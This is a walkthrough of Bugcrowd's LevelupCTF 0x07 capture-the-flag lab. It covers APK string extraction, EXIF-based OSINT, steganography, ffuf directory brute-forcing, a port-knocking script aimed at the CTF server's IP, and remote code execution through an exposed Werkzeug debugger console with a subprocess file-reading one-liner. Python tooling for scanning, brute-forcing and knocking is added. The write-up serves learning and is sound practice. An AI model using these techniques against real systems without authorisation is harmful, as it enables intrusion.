BugCrowd’s LevelupCTF 0x07 walkthrough

LevelupCTF is a seven-flag CTF. It contains vulnerabilities ranging from information disclosure to remote code execution, and each flag provides hints towards the next one. The CTF covers a wide range of challenges, which also makes it a great learning exercise.
Below are the vulnerabilities I found, with their Bugcrowd VRT priority ratings (P1 is the most severe):

Sensitive Data Exposure – P4
Broken Access Control (BAC) [Exposed Sensitive Android Intent] – P4
Sensitive Data Exposure [Images] – P3
Sensitive Data Exposure [Disclosure of Secrets – Web Application] – P3
Sensitive Data Exposure [Image Steganography] – P3
Remote Code Execution – P1
Remote Code Execution – P1

Below is the Walkthrough/Proof of Concept to get each flag.

FLAG-1:

Visiting https://07.levelupctf.com and doing some reconnaissance, you will find a "brief" that points towards the /radio URL.

Visiting /radio gave me a login panel. I tried SQLi, but it didn't get me anything. While going through the page source I found a login.js file under assets [https://07.levelupctf.com/assets/js/login.js]. That is suspicious in itself: login checks and other sensitive logic belong in server-side code, and anything shipped as client-side JavaScript can be read by every visitor. When I opened it I found the flag and the hint towards the next challenge. A simple sensitive information disclosure.

Secrets must never be stored this way. "If you are making it easy for yourself, you are making it easy for everyone else."

FLAG-2:

When I visited the URL provided under the first flag, https://07.levelupctf.com/222228a4e79d33a299f5d/s3cretc0mmunications, I got an .apk file.
An APK is just a zip archive, so I unpacked it and ran grep -r 'FLAG{' . over the extracted tree. The matching file was resources.arsc, and a quick strings resources.arsc | grep 'FLAG{'
gave me flag 2.

FLAG-3:

After finding the flag for level 2, I couldn't find any clue for level 3. Comparatively, this level was hard and took a lot of digging.
Running strings over classes.dex gave me the following paths; the first two are the URLs that matter for the next steps:
E/d41d8cd98f00b204e9800998ecf8427e/8cd98f00b204e9800998/forgotpassword
5/fa694c73da13c94e49cc82b/06a28bdb78b6c02e16862a3/chat
/index.html
/login
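
As an added example (not part of the original walkthrough), here is a small Python scanner that does the flag-2 and flag-3 digging in one pass: it opens the APK as the zip archive it is and pulls every FLAG{...} string and every path-like string out of each member, so resources.arsc and classes.dex are covered without unpacking or running strings by hand. The sample APK, its flag and its paths are constructed for the example; run it with a real .apk path as the argument to scan a real one.

```python
import io
import re
import sys
import zipfile

# CTF flags as seen on this page (32 hex characters), and URL-like paths that strings(1) would also show.
FLAG_RE = re.compile(rb"FLAG\{[0-9a-f]{32}\}", re.IGNORECASE)
PATH_RE = re.compile(rb"/[A-Za-z0-9_./-]{3,}")


def scan_apk(apk_bytes):
    """Walk every entry of the APK (a zip archive) and collect flag and path strings per member."""
    found = {}
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as zf:
        for name in zf.namelist():
            data = zf.read(name)
            flags = [m.decode() for m in FLAG_RE.findall(data)]
            paths = sorted({m.decode() for m in PATH_RE.findall(data)})
            if flags or paths:
                found[name] = {"flags": flags, "paths": paths}
    return found


def build_sample_apk():
    """Constructed stand-in for the CTF apk: a zip with the two members the walkthrough inspects.
    The flag value and the paths below are made up for this example."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("resources.arsc",
                    b"\x02\x00\x0c\x00app_name\x00FLAG{0123456789abcdef0123456789abcdef}\x00")
        zf.writestr("classes.dex",
                    b"dex\n035\x00/example/forgotpassword\x00/example/chat\x00/login\x00" + b"\x7f" * 8)
        zf.writestr("AndroidManifest.xml", b"\x03\x00\x08\x00manifest")
    return buf.getvalue()


if __name__ == "__main__":
    # With no argument the constructed sample is scanned; otherwise the .apk given on the command line.
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_apk()
    for member, hits in scan_apk(data).items():
        print(member, hits)
```

Scanning the raw member bytes rather than unpacked files also catches strings that apktool would otherwise decode away, and the path regex is what surfaces the forgotpassword and chat endpoints from classes.dex.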

Visiting the chat URL above gives an "invalid key" error.

So now I know I am looking for a key. I extracted the apk with apktool and ran grep -r -A 20 -B 20 'FLAG' over the output.

This gave me:

res/values/strings.xml- 8b0955d2682eb74347b9e71ea0558c67
res/values/strings.xml: FLAG{a445c73c8cb97421d1923a8c51c221fd}

I tried sending encrypted_chat_key: 8b0955d2682eb74347b9e71ea0558c67 as a request header using Burp, but no luck. I looked again using grep -r -A 20 -B 20 '5/fa694c73da13c94e49cc82b/06a28bdb78b6c02e16862a3/chat'.
I got this entry:
smali/com/example/levelup/MainActivity.smali- const-string v3, "3NCRYPT3D-CH4T"

Sending the header 3NCRYPT3D-CH4T: 8b0955d2682eb74347b9e71ea0558c67 instead worked, and I got the chat:

If you read the EXIF metadata of the giraffe image, you will get the flag and also information regarding the next one.

FLAG-4:

The EXIF data of the giraffe image gives you the GPS location where the picture was taken.

Time to use the /forgotpassword URL from level 3.
From the chat we know the agent's name: agent_521bcd5. I put this into the forgot-password page as the username and it gave me this question:

“What is the name of your favorite lion at the zoo?”

Here I did some OSINT with the GPS coordinates from the giraffe image. They resolved to the San Francisco Zoo, and Googling for the zoo's lion gave me "Jahari", which was accepted as the answer. It gave me a temporary login passcode for agent_521bcd5:

After logging in with agent_521bcd5 and 9a76a913ee9ae8d5b2, I was shown a target list. At this point I checked the /radio URL again, and there was the 4th flag:

FLAG-5:

The hint for the next flag points towards the images in the target list:

agent
ive noticed
obelisk hides
missions
in images
check out
the
target list
secret is
pwn4llthebugz
FLAG{f514875849460428b4dc40dd72a5a29a}

I looked at the agents' pictures under https://07.levelupctf.com/targets.

A couple of things to notice here: some agents have numbers written on their images.

agent_01 – 1337
agent_05 – 415
agent_07 – 2099
agent_09 – 921

In the page source I found the path under which the agents' images are stored: https://07.levelupctf.com/agents/

One odd thing about this path was that it returned 200 OK for every request, so filtering on the status code was useless. I brute-forced it with ffuf -w wordlist.txt -u https://07.levelupctf.com/agents/FUZZ -fs 0, where -fs 0 filters out the responses with a zero-length body, and that gave me agent87.jpg.
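
An added example, not from the original post, of the idea behind -fs 0: when a server answers 200 to every request, the status code carries no signal and you have to compare response sizes instead. The function below first requests a random name that cannot exist to learn what a miss looks like (ffuf's -ac auto-calibration does the same), then reports every candidate whose body size differs from that baseline, which generalises the hard-coded 0. The fake /agents/ directory, its file names and the wordlist are constructed for the example; http_fetch is the live fetcher and is not exercised offline.

```python
import secrets


def calibrate(fetch, prefix="agents/", ext=".jpg"):
    """Request a name that cannot exist and record what the server hands back for a miss."""
    bogus = prefix + secrets.token_hex(8) + ext
    status, body = fetch(bogus)
    return status, len(body)


def brute_force(fetch, wordlist, prefix="agents/", exts=(".jpg",)):
    """Return (path, status, size) for every candidate whose response size differs from the
    calibrated miss. Status codes are ignored on purpose: the target answers 200 to everything,
    so only the body size tells hits and misses apart."""
    _, miss_len = calibrate(fetch, prefix, exts[0])
    hits = []
    for word in wordlist:
        for ext in exts:
            path = prefix + word + ext
            status, body = fetch(path)
            if len(body) != miss_len:
                hits.append((path, status, len(body)))
    return hits


def http_fetch(base_url, timeout=5):
    """Live fetcher for real use: returns (status, body) for base_url + path."""
    import urllib.error
    import urllib.request

    def fetch(path):
        try:
            with urllib.request.urlopen(base_url + path, timeout=timeout) as resp:
                return resp.status, resp.read()
        except urllib.error.HTTPError as err:
            return err.code, err.read()
    return fetch


# Constructed fake of the /agents/ directory: every path returns 200, misses have an empty body.
FAKE_SITE = {
    "agents/agent01.jpg": b"\xff\xd8\xff\xe0" + b"\x00" * 200,
    "agents/agent87.jpg": b"\xff\xd8\xff\xe0" + b"\x00" * 300,
}


def fake_fetch(path):
    return 200, FAKE_SITE.get(path, b"")


# Constructed wordlist in the style of the agent image names.
SAMPLE_WORDLIST = ["agent%02d" % i for i in range(1, 100)]


if __name__ == "__main__":
    # Offline run against the fake directory; swap in http_fetch("https://host/") for a real target.
    for hit in brute_force(fake_fetch, SAMPLE_WORDLIST):
        print(hit)
```

Calibrating against a random name rather than assuming misses are empty is the habit to keep: a target that returns a 200 with a generic "not found" page of fixed size is handled the same way.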

exif on it gave nothing. When I checked the image with steghide it asked for a passphrase; I used pwn4llthebugz, the secret from the 4th flag's hint.

Here is the 5th flag, with the information for the next challenge.

FLAG – 6:

Getting this one was a good lesson. The challenge is based on port knocking: the server keeps port 3389 closed until it sees connection attempts on a secret sequence of ports. It's time to use the numbers from the agent images we found while looking for the 5th flag. Since the order was unknown, I generated every permutation of the four numbers and knocked with each one until 3389 opened.

Below are the sequences and the code I used for the port knocking.
Sequences of ports, one per line (this is the content of portknock.txt):
1337 415 2099 921
1337 415 921 2099
1337 2099 415 921
1337 2099 921 415
1337 921 2099 415
1337 921 415 2099
415 1337 2099 921
415 1337 921 2099
415 2099 1337 921
415 2099 921 1337
415 921 2099 1337
415 921 1337 2099
2099 415 1337 921
2099 415 921 1337
2099 1337 415 921
2099 1337 921 415
2099 921 1337 415
2099 921 415 1337
921 415 2099 1337
921 415 1337 2099
921 2099 415 1337
921 2099 1337 415
921 1337 2099 415
921 1337 415 2099

I used the sequences above to knock until 3389 opened.

You can generate them with this script:

import itertools
n = ['1337', '415', '2099', '921']  # the four numbers found on the agent images
# every ordering of the four ports, written one knock sequence per line
with open('portknock.txt', 'w') as f:
    for p in itertools.permutations(n, 4):
        f.write(' '.join(p) + '\n')

Below is the Python script I used for port knocking with the sequences above:

import subprocess
import time

# portknock.txt holds one candidate sequence per line, e.g. "1337 415 2099 921"
with open('portknock.txt', 'r') as f:
    for line in f:
        ports = line.split()          # also drops the trailing newline
        if not ports:
            continue
        # the knock client ships with knockd: knock <host> <port> [<port> ...]
        result = subprocess.run(['knock', '165.227.54.122'] + ports)
        print(' '.join(ports), '->', result.returncode)
        time.sleep(3)                 # let the daemon's sequence window reset between attempts

After running the above code, you will be able to access http://07.levelupctf.com:3389/.
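
An added example (my code, not the walkthrough's) that does the whole search without the knock binary: each knock is a plain TCP connect attempt, after every permutation it probes 3389 and stops as soon as the port accepts a connection, and it pauses between attempts so the daemon's sequence timeout can expire. FakeKnockd is a constructed stand-in for knockd that makes the search testable offline; the host and port numbers in the main block are the ones from the walkthrough.

```python
import itertools
import socket
import time


def tcp_knock(host, port, timeout=0.5):
    """Send one knock as a TCP connect attempt. knockd only needs to see the SYN, so a refused
    or timed-out connection still counts; whether the connect succeeds is irrelevant."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(timeout)
    try:
        sock.connect((host, port))
    except OSError:
        pass
    finally:
        sock.close()


def tcp_is_open(host, port, timeout=2.0):
    """Probe the guarded port; a completed handshake means the sequence was accepted."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def find_sequence(host, candidates, target, knock=tcp_knock, is_open=tcp_is_open,
                  settle=lambda: time.sleep(3)):
    """Try every ordering of `candidates` and return the first one after which `target` accepts
    a connection, or None if none of them work. `settle` runs between attempts so the daemon's
    sequence timeout can expire; without that pause the tail of one attempt plus the head of the
    next can form the real sequence and the open gets attributed to the wrong ordering."""
    if is_open(host, target):
        return ()                      # already open, nothing to knock
    for seq in itertools.permutations(candidates):
        for port in seq:
            knock(host, port)
        if is_open(host, target):
            return seq
        settle()
    return None


class FakeKnockd:
    """Constructed stand-in for knockd so the search can be exercised offline: a port out of
    order discards the partial sequence, and timeout() models the daemon's sequence timeout."""

    def __init__(self, secret, guarded):
        self.secret, self.guarded = tuple(secret), guarded
        self.stage, self.opened = 0, False

    def knock(self, host, port):
        if port == self.secret[self.stage]:
            self.stage += 1
            if self.stage == len(self.secret):
                self.opened, self.stage = True, 0
        else:
            self.stage = 0

    def is_open(self, host, port):
        return self.opened and port == self.guarded

    def timeout(self):
        self.stage = 0


if __name__ == "__main__":
    import sys
    host = sys.argv[1]                  # e.g. 165.227.54.122 from the walkthrough
    ports = (1337, 415, 2099, 921)      # the numbers from the agent images
    print(find_sequence(host, ports, 3389))
```

The probe after every attempt is what turns 24 blind knocks into a search that reports which ordering actually worked, and the pause between attempts is the part people skip and then wonder why the "wrong" sequence opened the port.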

Running ffuf against it gave me /console: the Werkzeug debugger console. An exposed debugger console lets anyone who can reach it execute arbitrary Python on the server, so it must never be enabled on a reachable host. That is the P1 vulnerability.

For flag 6 and flag 7, this is the console one-liner I used to read files and look around the directories:
from subprocess import getoutput; print(getoutput("cat flag.txt"))

After flag 6, I checked every file under the same directory. In .bash_history I found a reference to a passwords.txt file under /opt/.

Log in using the matriarch credentials.

Under gameover you will find the final flag.

Overall, it was a fantastic CTF with a lot of learning on different vulnerabilities. Each step was hard to get, but my favourite part was the OSINT.